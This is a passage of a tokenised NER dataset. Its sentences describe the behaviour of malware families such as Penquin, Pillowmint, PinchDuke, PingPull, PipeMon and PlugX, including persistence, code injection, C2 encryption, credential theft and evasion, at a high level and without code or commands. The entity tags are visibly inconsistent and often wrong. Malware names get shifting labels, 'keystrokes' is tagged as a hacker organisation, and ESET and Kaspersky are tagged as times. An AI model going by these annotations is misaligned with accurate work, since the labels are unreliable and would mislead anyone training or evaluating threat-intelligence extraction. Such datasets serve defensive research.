"tokens": [ "Penquin", "has", "mimicked", "the", "Cron", "binary", "to", "hide", "itself", "on", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "sniff", "network", "traffic", "to", "look", "for", "packets", "matching", "specific", "conditions." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Penquin", "C2", "mechanism", "is", "based", "on", "TCP", "and", "UDP", "packets." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Penquin", "installs", "a", "`TCP`", "and", "`UDP`", "filter", "on", "the", "`eth0`", "interface." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "report", "the", "file", "system", "type", "and", "disk", "space", "of", "a", "compromised", "host", "to", "C2." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "report", "the", "IP", "of", "the", "compromised", "host", "to", "attacker", "controlled", "infrastructure." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Penquin", "will", "connect", "to", "C2", "only", "after", "sniffing", "a", "\"magic", "packet\"", "value", "in", "TCP", "or", "UDP", "packets", "matching", "specific", "conditions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Penquin", "can", "execute", "remote", "commands", "using", "bash", "scripts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Peppy", "has", "the", "ability", "to", "automatically", "exfiltrate", "files", "and", "keylogs." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-Features" ] }, { "tokens": [ "Peppy", "can", "identify", "specific", "files", "for", "exfiltration." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Peppy", "can", "download", "and", "execute", "remote", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Peppy", "can", "log", "keystrokes", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Peppy", "can", "take", "screenshots", "on", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Peppy", "can", "use", "HTTP", "to", "communicate", "with", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Peppy", "has", "the", "ability", "to", "execute", "shell", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Pillowmint", "has", "used", "a", "malicious", "shim", "database", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "encrypted", "stolen", "credit", "card", "information", "with", "AES", "and", "further", "encoded", "it", "with", "Base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "used", "the", "NtQueueApcThread", "syscall", "to", "inject", "code", "into", "svchost.exe." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pillowmint", "can", "uninstall", "the", "malicious", "service", "from", "an", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "collected", "credit", "card", "data", "using", "native", "API", "functions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "been", "decompressed", "by", "included", "shellcode", "prior", "to", "being", "launched." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "deleted", "the", "filepath", "<code>%APPDATA%\\Intel\\devmonsrv.exe</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Pillowmint", "has", "stored", "a", "compressed", "payload", "in", "the", "Registry", "key", "<code>HKLM\\SOFTWARE\\Microsoft\\DRM</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Pillowmint", "has", "modified", "the", "Registry", "key", "<code>HKLM\\SOFTWARE\\Microsoft\\DRM</code>", "to", "store", "a", "malicious", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "used", "multiple", "native", "Windows", "APIs", "to", "execute", "and", "conduct", "process", "injections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Pillowmint", "has", "been", "compressed", "and", "stored", "within", "a", "registry", "key.", "Pillowmint", "has", "also", "obfuscated", "the", "AES", "key", "used", "for", "encryption." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "used", "a", "PowerShell", "script", "to", "install", "a", "shim", "database." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "can", "iterate", "through", "running", "processes", "every", "six", "seconds", "collecting", "a", "list", "of", "processes", "to", "capture", "from", "later." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pillowmint", "has", "used", "shellcode", "which", "reads", "code", "stored", "in", "the", "registry", "keys", "<code>\\REGISTRY\\SOFTWARE\\Microsoft\\DRM</code>", "using", "the", "native", "Windows", "API", "as", "well", "as", "read", "<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces</code>", "as", "part", "of", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PinchDuke", "steals", "credentials", "from", "compromised", "hosts.", "PinchDuke's", "credential", "stealing", "functionality", "is", "believed", "to", "be", "based", "on", "the", "source", "code", "of", "the", "Pinch", "credential", "stealing", "malware", "(also", "known", "as", "LdPinch).", "Credentials", "targeted", "by", "PinchDuke", "include", "ones", "associated", "with", "many", "sources", "such", "as", "The", "Bat!,", "Yahoo!,", "Mail.ru,", "Passport.Net,", "Google", "Talk,", "and", "Microsoft", "Outlook." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SecTeam", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PinchDuke", "steals", "credentials", "from", "compromised", "hosts.", "PinchDuke's", "credential", "stealing", "functionality", "is", "believed", "to", "be", "based", "on", "the", "source", "code", "of", "the", "Pinch", "credential", "stealing", "malware", "(also", "known", "as", "LdPinch).", "Credentials", "targeted", "by", "PinchDuke", "include", "ones", "associated", "with", "many", "sources", "such", "as", "Netscape", "Navigator,", "Mozilla", "Firefox,", "Mozilla", "Thunderbird,", "and", "Internet", "Explorer." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "B-Tool", "B-Way", "B-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "PinchDuke", "collects", "user", "files", "from", "the", "compromised", "host", "based", "on", "predefined", "file", "extensions." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PinchDuke", "searches", "for", "files", "created", "within", "a", "certain", "timeframe", "and", "whose", "file", "extension", "matches", "a", "predefined", "list." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PinchDuke", "steals", "credentials", "from", "compromised", "hosts.", "PinchDuke's", "credential", "stealing", "functionality", "is", "believed", "to", "be", "based", "on", "the", "source", "code", "of", "the", "Pinch", "credential", "stealing", "malware", "(also", "known", "as", "LdPinch).", "Credentials", "targeted", "by", "PinchDuke", "include", "ones", "associated", "many", "sources", "such", "as", "WinInet", "Credential", "Cache,", "and", "Lightweight", "Directory", "Access", "Protocol", "(LDAP)." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "PinchDuke", "gathers", "system", "configuration", "information." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PinchDuke", "transfers", "files", "from", "the", "compromised", "host", "via", "HTTP", "or", "HTTPS", "to", "a", "C2", "server." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Ping", "can", "be", "used", "to", "identify", "remote", "systems", "within", "a", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "collect", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "decrypt", "received", "data", "from", "its", "C2", "server", "by", "using", "AES." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PingPull", "has", "the", "ability", "to", "exfiltrate", "stolen", "victim", "data", "through", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "enumerate", "storage", "volumes", "and", "folder", "contents", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "mimic", "the", "names", "and", "descriptions", "of", "legitimate", "services", "such", "as", "`iphlpsvc`,", "`IP", "Helper`,", "and", "`Onedrive`", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SecTeam", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "PingPull", "variants", "have", "the", "ability", "to", "communicate", "with", "C2", "servers", "using", "ICMP", "or", "TCP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "PingPull", "can", "use", "HTTPS", "over", "port", "8080", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "encode", "C2", "traffic", "with", "Base64." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "use", "AES,", "in", "cipher", "block", "chaining", "(CBC)", "mode", "padded", "with", "PKCS5,", "to", "encrypt", "C2", "server", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "retrieve", "the", "hostname", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "can", "retrieve", "the", "IP", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "has", "the", "ability", "to", "timestomp", "a", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Features", "O" ] }, { "tokens": [ "A", "PingPull", "variant", "can", "communicate", "with", "its", "C2", "servers", "by", "using", "HTTPS." ], "ner_tags": [ "O", "B-Way", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "B-Way" ] }, { "tokens": [ "PingPull", "can", "use", "`cmd.exe`", "to", "run", "various", "commands", "as", "a", "reverse", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PingPull", "has", "the", "ability", "to", "install", "itself", "as", "a", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "installer", "can", "use", "UAC", "bypass", "techniques", "to", "install", "the", "payload." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon,", "its", "installer,", "and", "tools", "are", "signed", "with", "stolen", "code-signing", "certificates." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "attempt", "to", "gain", "administrative", "privileges", "using", "token", "impersonation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PipeMon", "can", "decrypt", "password-protected", "executables." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "inject", "its", "modules", "into", "various", "processes", "using", "reflective", "DLL", "loading." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "PipeMon", "modules", "are", "stored", "encrypted", "on", "disk." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "switch", "to", "an", "alternate", "C2", "domain", "when", "a", "particular", "date", "has", "been", "reached." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "has", "stored", "its", "encrypted", "payload", "in", "the", "Registry", "under", "`HKLM\\SOFTWARE\\Microsoft\\Print\\Components\\`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "install", "additional", "modules", "via", "C2", "commands." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "modules", "are", "stored", "on", "disk", "with", "seemingly", "benign", "names", "including", "use", "of", "a", "file", "extension", "associated", "with", "a", "popular", "word", "processor." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "has", "modified", "the", "Registry", "to", "store", "its", "encrypted", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon's", "first", "stage", "has", "been", "executed", "by", "a", "call", "to", "<code>CreateProcess</code>", "with", "the", "decryption", "password", "in", "an", "argument.", "PipeMon", "has", "used", "a", "call", "to", "<code>LoadLibrary</code>", "to", "load", "its", "installer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "PipeMon", "communication", "module", "can", "use", "a", "custom", "protocol", "based", "on", "TLS", "over", "TCP." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "use", "parent", "PID", "spoofing", "to", "elevate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "PipeMon", "installer", "has", "modified", "the", "Registry", "key", "<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows", "x64\\Print", "Processors</code>", "to", "install", "PipeMon", "as", "a", "Print", "Processor." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "iterate", "over", "the", "running", "processes", "to", "find", "a", "suitable", "injection", "target." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "check", "for", "the", "presence", "of", "ESET", "and", "Kaspersky", "security", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Time", "O", "B-Time", "O", "O" ] }, { "tokens": [ "PipeMon", "has", "used", "call", "to", "<code>LoadLibrary</code>", "to", "load", "its", "installer.", "PipeMon", "loads", "its", "modules", "using", "reflective", "loading", "or", "custom", "shellcode." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "communications", "are", "RC4", "encrypted." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "collect", "and", "send", "OS", "version", "and", "computer", "name", "as", "a", "part", "of", "its", "C2", "beacon." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "collect", "and", "send", "the", "local", "IP", "address,", "RDP", "information,", "and", "the", "network", "adapter", "physical", "address", "as", "a", "part", "of", "its", "C2", "beacon." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "I-Features", "I-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "send", "time", "zone", "information", "from", "a", "compromised", "host", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PipeMon", "can", "establish", "persistence", "by", "registering", "a", "malicious", "DLL", "as", "an", "alternative", "Print", "Processor", "which", "is", "loaded", "when", "the", "print", "spooler", "service", "starts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pisloader", "uses", "DNS", "as", "its", "C2", "protocol." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Pisloader", "has", "commands", "to", "list", "drives", "on", "the", "victim", "machine", "and", "to", "list", "file", "information", "for", "a", "given", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pisloader", "has", "a", "command", "to", "upload", "a", "file", "to", "the", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pisloader", "obfuscates", "files", "by", "splitting", "strings", "into", "smaller", "sub-strings", "and", "including", "\"garbage\"", "strings", "that", "are", "never", "used.", "The", "malware", "also", "uses", "return-oriented", "programming", "(ROP)", "technique", "and", "single-byte", "XOR", "to", "obfuscate", "data." ], "ner_tags": [ "B-Way", "B-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pisloader", "establishes", "persistence", "via", "a", "Registry", "Run", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Responses", "from", "the", "Pisloader", "C2", "server", "are", "base32-encoded." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Pisloader", "has", "a", "command", "to", "collect", "victim", "system", "information,", "including", "the", "system", "name", "and", "OS", "version." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pisloader", "has", "a", "command", "to", "collect", "the", "victim's", "IP", "address." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pisloader", "uses", "cmd.exe", "to", "set", "the", "Registry", "Run", "key", "value.", "It", "also", "has", "a", "command", "to", "spawn", "a", "command", "shell." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "has", "the", "ability", "to", "use", "DLL", "search", "order", "hijacking", "for", "installation", "on", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "has", "used", "DLL", "side-loading", "to", "evade", "anti-virus." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "can", "be", "configured", "to", "use", "DNS", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "uses", "Pastebin", "to", "store", "C2", "addresses." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "decompresses", "and", "decrypts", "itself", "using", "the", "Microsoft", "API", "call", "RtlDecompressBuffer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PlugX", "has", "a", "module", "to", "enumerate", "drives", "and", "find", "files", "recursively." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "can", "modify", "the", "characteristics", "of", "folders", "to", "hide", "them", "from", "the", "compromised", "user." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "has", "a", "module", "to", "download", "and", "execute", "files", "on", "the", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "has", "a", "module", "for", "capturing", "keystrokes", "per", "process", "including", "window", "titles." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "version", "of", "PlugX", "loads", "as", "shellcode", "within", "a", ".NET", "Framework", "project", "using", "msbuild.exe,", "presumably", "to", "bypass", "application", "control", "techniques." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "one", "instance,", "menuPass", "added", "PlugX", "as", "a", "service", "with", "a", "display", "name", "of", "\"Corel", "Writing", "Tools", "Utility.\"" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "PlugX", "has", "been", "disguised", "as", "legitimate", "Adobe", "and", "PotPlayer", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "PlugX", "has", "a", "module", "to", "create,", "delete,", "or", "modify", "Registry", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "PlugX", "can", "use", "the", "Windows", "API", "functions", "`GetProcAddress`,", "`LoadLibrary`,", "and", "`CreateProcess`", "to", "execute", "another", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "has", "a", "module", "to", "enumerate", "network", "shares." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "can", "be", "configured", "to", "use", "raw", "TCP", "or", "UDP", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "can", "use", "API", "hashing", "and", "modify", "the", "names", "of", "strings", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "has", "a", "module", "to", "list", "the", "processes", "running", "on", "a", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "can", "enumerate", "and", "query", "for", "information", "contained", "within", "the", "Windows", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "adds", "Run", "key", "entries", "in", "the", "Registry", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "allows", "the", "operator", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "PlugX", "can", "use", "RC4", "encryption", "in", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "checks", "if", "VMware", "tools", "is", "running", "in", "the", "background", "by", "searching", "for", "any", "process", "named", "\"vmtoolsd\"." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PlugX", "has", "a", "module", "for", "enumerating", "TCP", "and", "UDP", "network", "connections", "and", "associated", "processes", "using", "the", "<code>netstat</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "PlugX", "can", "be", "configured", "to", "use", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "allows", "actors", "to", "spawn", "a", "reverse", "shell", "on", "a", "victim." ], "ner_tags": [ "B-SamFile", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PlugX", "can", "be", "added", "as", "a", "service", "to", "establish", "persistence.", "PlugX", "also", "has", "a", "module", "to", "change", "service", "configurations", "as", "well", "as", "start,", "control,", "and", "delete", "services." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "compress", "files", "with", "zip." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "PoetRAT", "used", "TLS", "to", "encrypt", "command", "and", "control", "(C2)", 